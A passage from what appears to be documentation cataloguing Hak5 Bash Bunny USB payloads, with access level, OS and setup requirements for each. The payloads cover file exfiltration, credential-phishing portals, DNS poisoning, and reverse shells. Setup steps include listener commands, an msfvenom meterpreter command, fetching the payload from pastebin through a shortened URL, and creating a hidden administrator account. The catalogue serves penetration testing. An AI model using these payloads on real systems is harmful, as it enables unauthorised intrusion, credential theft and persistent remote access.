* Test-Connection handling by ICMP (no lame sleeps)
* Hidden powershell window by default


### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Configured to copy docx files by default. Change $exfil_ext in s.ps1 to desired.

## Exfiltrator

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/usb_exfiltrator" %}

> Exfiltrates files from the users Documents folder Saves to the loot folder on the Bash Bunny USB Mass Storage partition named by the victim hostname, date and timestamp.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* By default the staged payload exfiltrates PDF files. Change the xcopy commands from e.cmd to your liking.

## Metasploit-Autopwn

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exploitation/Metasploit-Autopwn" %}

> Runs Metasploit db_autopwn module against the dhcp connected client to the Bash Bunny device exploiting locked and unlocked machines that running vulnerable OSes or services.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [x] None
  * [ ] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [x] Mac
* [x] Android

### Output

> Will store output in `/loot/`

### Requirements

* Ruby 2.4.1 installed via 'rbenv' (the best to have ruby installed without any problems)
* You must have metasploit installation up and running in path /toos/metasploit-framework/
* Copy auto_pwn.rc metasploit resources file from the payload folder to /tools/ by SSHing into your bunny
* One-time fix for adding user "postgres" to the network user groups (should be done by HAK5 folks in the first place)

## Blue Team PC Audit

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/general/BlueTeamPCAudit" %}

> The PowerShell script changes the users background to "background.bmp", this allows Blue team to remind users to lock their PCs. The PowerShell script also sends an email to the Security Team with information about the users PC. This allows the Security Team to keep a record of repeatable offenders.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Edit 1.ps1 to specify usernames, email addresses, and domain. You will need to add your background iamge with the name of "background.bmp". This file will be the new background on the PC. The script will accept other file formats as long as you change the file extension in the powershell script. Place "background.bmp" in the same directory as your payload, and you should be ready to use the Blue Team PC Audit script.

## ExecutableInstaller

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/general/ExecutableInstaller" %}

> Copies an executable (or executable in a directory) from the Bash Bunny USB Mass Storage to %APPDATA% and then executes it with the --startup parameter (or whatever parameter you want).

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* By default the staged payload copies the payload payload.exe from the root of the Bash Bunny, rename this to whatever you like inside by editing e.cmd. The payload copies to %APPDATA%, change this to wherever you like by editing e.cmd. You may also copy a payload inside a directory, see comments in e.cmd.

## Proxy Interceptor

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/general/Proxy_Interceptor" %}

> This payload will enable a proxy and import an SSL certificate to a Windows computer for Internet Explorer and Chrome (FireFox is in progress for 2.0) The script uses a combination of Ducky Code and PowerShell.

> Note: Currently no falure LED, if remains red for more than 60 seconds script failed. Will build checks in later version.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Certificate needs to be in .pem format and in the root switch directory with payload.txt, set the certificate and proxy information in the vars.ps1 file.

## NIC Sharing from Windows

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/general/Windows_NIC_Sharing" %}

> Sets up Networking for Bash Bunny. You should be able to SSH to the Bash Bunny at 172.16.64.1 once networking has been configured.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## Captive Portal

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/Captiveportal" %}

> Redirects and spoofs all DNS requests to the Bash Bunny, and serves a configurable captive portal. All captured credentials will be logged in the payload's folder in a file named capture.log.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/nix.
* The portal.html file can be modified as seen fit, but changes must remain in the file (no external images, css, or javascript).
* To capture more information from the user, simply add more form inputs to portal.html, and update the INPUTS line in payload.txt. Example: INPUTS=(email username password)

## Hosts DNS Spoofer

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/Local_DNS_Poisoning" %}

> Redirects a domain to a set IP adres by changing the hosts file. The UAC bypass is done so it works on windows 10.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Change the domain you want to redirect and the IP you want to direct it to.

## Mac Phish

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/MacPhish" %}

> Credz to Fuzzynop for introducing me to the technique: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html Using ducky script, it opens a terminal and uses the osascript command in an attempt to social engineer the root password, then saves this back to bash bunny in the loot dir

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## DNS Poisoning Attack

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/dns_poisoning_mac" %}

> Redirects a domain to a set IP adres by changing the hosts file.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Change the domain you want to redirect and the IP you want to direct it to.

## 90s Mode

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/90sMode" %}

> Turns back the clock to a k-rad ultra ereet 1990's VGA resolution Executes p.ps1 from the selected switch folder of the Bash Bunny USB Disk partition.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* By default the payload switches to the very cool 640x480 resoluiton, however this can be configured to other standards such as 800x600 or 1024x768 in the last line of r.ps1 (this should eventually become a config line in payload.txt)

## Bunny-Flip

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/Bunny-Flip" %}

> Bunny-Flip is the future. Who needs to manually flip a monitor when you can do it virtually?
> Windows 7 only. Bunnyscript uses a simple loop to flip screens every 0.300 seconds.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Currently the only options avalible are to set the amount of times you want the screen to flip. Please see OPTIONS in payload.txt
* 1 = flips screen left, right, down and up once.

## Notepad_fun

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/Notepad_fun" %}

> A harmless prank to remind them to lock their pc.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## RAZ_ThemeChanger

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/RAZ_ThemeChanger" %}

> Executes theme file (theme.themepack) from the ${SWITCH_POSITION} folder in the payloads library of the Bash Bunny USB Disk partition.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* The following files must exist in the switch folder:
* theme.themepack - The Windows theme file used to set the wallpaper and colors of the screen.
* Note: themepack files are windows zipfiles which contain wallpapers and other files (screensavers, sounds, etc). You can export your own themepack using Windows GUIs. Just look it up exporting a windows themepack.

## Startup-Message

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/Startup-Message" %}

> This little HID Attack, will use cmd to create a file in the startup directory of the logged in user on the target PC. Which will display a message set by the attacker on logging in.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* You can edit the script to change the name of the file and the text that will be displayed. Defaults: startup.bat; I will lock my PC next time!

## UnifiedRickRoll

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/UnifiedRickRoll" %}

> Runs a script in background that will crank up volume and rick roll target at specified time.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [X] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* set time to run in payload.txt

## UnifiedRickRoll

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/UnifiedRickRoll" %}

> Runs a script in background that will crank up volume and rick roll target at specified time. Also removes 'run' diologue history to "hide" tracks
> The format for the time is as follows: How many hours have passed since midnight + how many minutes have passed since that hour started.
> As an example: 1:39am would be 139, 1:39pm would be 1339 (it's in 24 hour format, not 12), 5:03pm would be 173, and 5:02am would be 52.
> This is kinda confusing at first, but if you tinker with it for a couple minutes, it's pretty easy to figure out.
> Additionally, you can run this in any powershell window, and it will set the current time in that format to $time:
> $time=(Get-Date).Hour.toString()+(Get-Date).Minute.toString().

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* set time to run in payload.txt

## Continuous Locker

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/cross-platform_continuous_locker" %}

> Continuously locks the workstation every second by injecting the lock screen keyboard shortcut for each major OS.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## Lock Out

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/cross_platform_lockout" %}

> HID Attack injects common lock screen keyboard shortcuts for Windows, Mac and Linux then proceeds to continuously inject these lock screen keyboard combos in addition to SHIFT HOME and BACKSPACE to delete anything typed into the password prompt.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## Lock PC Prank

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/lockpc" %}

> A variation of the Notepad fun payload written by The10FpsGuy and Mrhut10.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## macWallpaper

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/macDesktop" %}

> Runs a script in background that will download pictures of my little pony (or whatever else you'd like) and randomly sets that as their desktop background every 45 minutes - 5 hours. change number in for loop to decide how many times it will change their background.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## nCage

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/ncage" %}

> ATTENTION: Requires newest firmware (1.5+) with newest extensions
>Installs the ncage (or any) Google Chrome extension using jquery which is kindly supplied by the app store.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Configure each ducky.{win,osx} file to your liking

## Wallpaper Changer of DOOM!!!!

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/wallpaper-changer-of-doom" %}

> Single stage powershell one-liner executes from run dialog. CMD opens a minimized powershell window which downloads b.jpg (change this URL) to c:\windows\temp then sets the registry entry to change the wallpaper, then finally loops over an undocumented USER32.DLL feature for 60 seconds to force a user profile refresh.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## Win93 Prank

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/prank/win93" %}

> 1. First, uses a Ethernet Attack to run an OS detection via NMAP
2. Second, uses a HID Attack to launch a fullscreen browser pointing to www.windows93.net
3. leaves a log and the last nmap scan result in $LOOTDIR/win93
.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* None needed but:
* you can set the default OS if nmap scan fail to detect ( set DEFAULT_OS to MAC or LINUX )

## GetServicePerm

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/GetServicePerm" %}

> When executed on a Windows host the payload gathers a list of permissions on executables used as a service. This is useful when a service is executed with elevated privileges but is modifiable by everyone. When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* The only thing you will need to change is the Ducky language so it matches the target.

## Info Grabber

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber" %}

> Gather a lot of information about the computer and place it in a text file in loot/info/.
> Updates include code/output cleanup, faster runtime, and more veiled execution.
> Here you can se what it will look like:

```
System Information for:  DESKTOP-9BVPPVN

Manufacturer: Dell Inc.

Model: XPS 13 9360

Serial Number: *******

CPU: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz

HDD Capacity: 464.38GB

HDD Space: 82.32 % Free (382.28GB)

RAM: 15.89GB

Operating System: Microsoft Windows 10 Home, Service Pack: 0

User logged In: DESKTOP-9BVPPVN\aknem

Last Reboot: 02/21/2017 19:49:30

Computers MAC adress: ****************

Computers IP adress: ***********

Public IP adress: ****************

RDP: RDP is NOT enabled


| ProfileName      | SSID                                  | Password                              |
| ---------------- | ------------------------------------- | ------------------------------------- |
| privatsna11234   | privatsna11234                        | ********                              |
| privatsna11234   | privatsna11234                        | ********                              |

```

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input.

## Link_File_analysis

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/Link_File_analysis" %}

> Based on a payload written by Simen Kjeserud
Tested on firmware 1.3
Searches the user profile for .lnk files and reports on the file name, Target file, Date Created, Date Last Written. Results are provided in a CSV file.
Output = \loot\Link-Files\link_files.csv
Background In an incident where it is suspected that a user has exfiltrated data to a USB drive, the target element of any .lnk files may show files on external media (i.e. not the C: drive.).
Note - using this payload is NOT forensically sound!

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## Linux Info Grabber

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/LinuxInfoGrabber" %}

> Extract system information. Uses debian apt to list installed applications.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [x] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## User Lister

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/MacGetUsers" %}

> A payload that lists the users on the system and creates a file inside a folder on the BashBunny called MacLoot/MacUsers.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## MacProfiler

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/MacProfiler" %}

> Uses a HID/Storage Attack to create a system profile including the following information: Terminal history. Current clipboard contents. List of users on the system. ifconfig data. Systems WAN IP. All login items set to start up with the system. List of installed Applications from /Applications.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## Process Info

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/ProcessInfo" %}

> This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows, and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* none

## Nmapper

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/nmapper" %}

> Scans target with nmap using specified options Saves sequential logs to mass storage loot folder

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/nix Uncomment ATTACKMODE at the bottom of this payload to enable switching to USB Mass Storage when scan completes.

## RDP Checker

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/rdp_checker" %}

> Checks whether RDP is enabled on target machine Green=Enabled. Red=Disabled.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* impacket must be installed and setup in /tools

## Hershell Encrypted Reverse Shell

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/remote_access/Hershell_MacLinuxWindows_ReverseShell" %}

> Simple TCP reverse shell written in Go.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [x] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
* Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe)
* Uncomment desired target OS payload lines and ensure others are commented out
* Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343)
* Execute attack via Bash Bunny

## Reverse Shell

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/remote_access/LinuxReverseShell" %}

> With the help of ducky script, it opens a terminal window using CTRL ALT T. Once the window is open it will copy the script to a hidden directory in the home directory. The script will then be executed which starts a background reverse shell, delete itself and closes the terminal window.
Great when combined with the LAN Turtle :-)
Example listening for the connection on linux: nc -nlvp 4444

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [x] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* RHOST The host computer to connect to
* RPORT The post to use for the connection

## Reverse Shell

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/remote_access/MacPersistentReverseShell" %}

> Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Plug in Bash Bunny in arming mode
* Move files from MacPersistentReverseShell to either switch folder
* Edit the payload.txt file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 wink)
* Unplug Bash Bunny and switch it to the position the payload is loaded on
* Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec)
* Unplug the Bash Bunny and go to attacker's machine
* Listen on the port you chose in the payload.txt file on whichever program you'd like (I use NetCat)
  - If using NetCat, run the command nc -nlvp 1337 (replace the port with the port in connect.sh)
  - If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe.
* Wait for connection (Should take no longer than 1 minute as the cron job runs every minute)
* Once a bash shell prompt appears...YOU'RE DONE!! smiley and you can disconnect and reconnect to the victim at any time as long as the user is logged in

## Reverse Shell

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/remote_access/MacReverseShell" %}

> Using ducky script, it opens a python reverse shell to the IP and PORT of your choosing. Also, as a nice little bonus, it runs the DYLD exploit that, if vulnerable will give you a root shell.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [ ] Windows
* [ ] Linux
* [x] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* This is configured for Macbooks as a keyboard. I am not 100% about how the VID and PID variables work, so that may just be BS at the top :) - That's what github is for. Exploit does not work on updated macs

## SingleSecondShell

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/remote_access/SingleSecondShell" %}

> The <1 Second ReverseShell Payload is going to run blazing fast on the Bash Bunny, and cannot work on any other BadUSB devices, such as the USB Rubber Ducky that quick. That is obviously the reason this Payload is dedicated and specifically developed for the Bash Bunny. Plug in, and before you know it, you've got a shell. How awesome is that?

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

#### Generating Payload

In order to generate your reverse_tcp Payload, you need to run the following command on your Kali machine (unless you have msfvenom installed on another OS): msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f psh-cmd –smallest

Make sure to replace YOUR_IP with your local/public IP Address (depending on the type of attack you are looking to perform) and YOUR_PORT with the port that you've forwarded (if you are performing a public attack, outside your network).

When the payload is generated, remove everything up to powershell.exe and upload it to pastebin. Here's my example: http://pastebin.com/raw/DJbS5mTj

#### Shortening the URL

As you can see, we have a pretty long URL. So, in order to shorten the URL and reduce the amount of keystrokes, therefore attacking time, we are going to be using a URL shortening service, such as https://goo.gl/.

#### Completeing the script

That's it. Now just replace the $u='YOUR_LINK' with your new URL. For example: $u='goo.gl/8ggZD1'

Note: You do not need to include http(s):// in your URL, so you can go ahead and get rid of that too to reduce keystrokes and speedup the keystroke injection.

#### Listening to Connections

Listening to connections is pretty straightforward, but I'm not going to cover it in detail in this tutorial. All you need to do is use a listener software, CLI or GUI, such as msfconsole or Armitage, both of which can be setup to work with each other very easily.

## USB Intruder

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/remote_access/USB_Intruder" %}

> #### THIS PAYLOAD ASSUMES YOUR VICTIM HAS ADMINISTRATOR PRIVILEGES
Infiltrates a target system and performs the following:
Created a hidden ProgData folder in the %WinDir% (HID) Sets powershell execution to unrestricted (HID) Copies files from the USB_Intruder directory on the BashBunny to the hidden ProgData folder in the Windows directory (STORAGE) Launches seq1.ps1 that launches the following tasks in order Creates a new user with the following credentials - pwnie:dungothacked (UAC.bat) Sets new user pwnie to local Administrators group (UAC.bat) Shares the root of the C: drive with full permissions to the new user pwnie with the label HACKED$ (Hidden) (UAC.bat) Hides the new user pwnie from the logon screen (hide.ps1) Executes the eject.ps1 file that properly ejects the Mass Storage portion of the payload (eject.ps1) Executes a shell.bat file that a Meterpreter script that calls back to the Attacker's Handler (Create/Replace with your own) Cleans up the Run dialogue history (HID) Sync's the BashBunny for final removal (BB)

#### undo.bat is provided to reverse the creation actions above (in case you want to test)

#### Be sure to have your handler ready to accept the incoming connection from the victim

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [ ] User
  * [x] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Replace the shell.bat file in the USB_Intruder folder with your own custom Meterpreter script or what ever payload you would like.
* There is always potential for additional scripts to be run from the seq1.bat file, so bolster it with additional jobs.
* You will need to change delays accordingly to the profile of the victim's PC hardware.

## Undercover-Bunny

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/remote_access/UndercoverBunny" %}

> Creates a Wi-Fi network using CMD when plugged in.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

* Please see script.

## Unicorn Powershell Injection

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/remote_access/Unicorn_PowerShell_Injection" %}

> A simple script that allows you to inject any metasploit payload with powershell and gain meterpreter or shell access to the target PC.

### Access level

* **System**
  * [x] Physical
  * [ ] Network
* **Login**
  * [ ] None
  * [x] User
  * [ ] Admin
  * [ ] System

### OS

* [x] Windows
* [ ] Linux
* [ ] Mac
* [ ] Android

### Output

> Will store output in `/loot/`

### Requirements

Configuring this payload is pretty time-consuming, but it's worth it.

* Download Trustedsec's Unicorn: https://github.com/trustedsec/unicorn and use it to generate a powershell attack script.
* After you generate a powershell script, execute $ msfconsole -r unicorn.rc in the same directory in order to start the listener.
* You can use this software(unicorn bash bunny payload generator) to generate a payload.txt from the powershell_attack.txt.
* Transfer the payload.txt to one of the switches on the Bash Bunny. You're ready to go!

## JavaScript Meterpreter Stager Win x86_64

{% embed url="https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/WiPassDump" %}

> Tested successful on Win10

    Modified from following like:
        https://github.com/Cn33liz/JSMeter/blob/master/JSMeter.js
            Run js on target machine, cscript JSMeter.js
    USB HID STORAGE Attck
        Attempts HTTP(s) download of Two (2) additional payloads.
    These files coinsist of:
        BB-Meterpreter-Winx64.js -> Actual bytecode of Meterpreter Stager payload
        inv.vbs -> creates hidden command terminal to execute commands
    Attempts to execute the malicious payload in an automated fashion from hidden cmd prompts

>Script Logic:

    STAGE1():
        if payload does not exist on target:
            if inet connection:
                Attempts HTTPS connection to pastebin
                    Grabs both payloads and save to %temp%
            else:
                Opens a cmd prompt, under current users context
                    Echo contents to two files:
